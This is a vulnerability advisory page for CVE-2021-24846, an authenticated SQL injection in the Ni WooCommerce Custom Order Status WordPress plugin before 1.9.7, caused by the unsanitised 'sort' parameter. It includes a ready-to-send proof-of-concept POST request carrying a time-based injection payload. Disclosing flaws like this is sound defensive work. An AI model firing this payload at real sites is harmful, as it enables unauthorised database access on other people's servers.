Lucene search
JrXnmWPEX-ID:A1E7CD2B-8400-4C5D-8B47-A8CCD1E21675HistoryNov 22, 2021 - 12:00 a.m.
Ni WooCommerce Custom Order Status < 1.9.7 - Subscriber+ SQL Injection
2021-11-2200:00:00
JrXnm
92
0.001 Low
EPSS
Percentile
37.8%
The get_query() function of the plugin, used by the niwoocos_ajax AJAX action, available to all authenticated users, does not properly sanitise the sort parameter before using it in a SQL statement, leading to an SQL injection, exploitable by any authenticated users, such as subscriber
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [Any authenticated user]
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
action=niwoocos_ajax&sub_action=order_status_report&call=get_report&sort=procedure+analyse(updatexml(rand(),concat(0x3a,benchmark(10000000,sha1(1))),0x20),1)Related
prion
prion
Sql injection
2021-12-21 09:15:00
cve
cve
CVE-2021-24846
2021-12-21 09:15:07
cvelist
cvelist
wpvulndb
wpvulndb
Ni WooCommerce Custom Order Status < 1.9.7 - Subscriber+ SQL Injection
2021-11-22 00:00:00
patchstack
patchstack
cnvd
cnvd
nvd
nvd
CVE-2021-24846
2021-12-21 09:15:07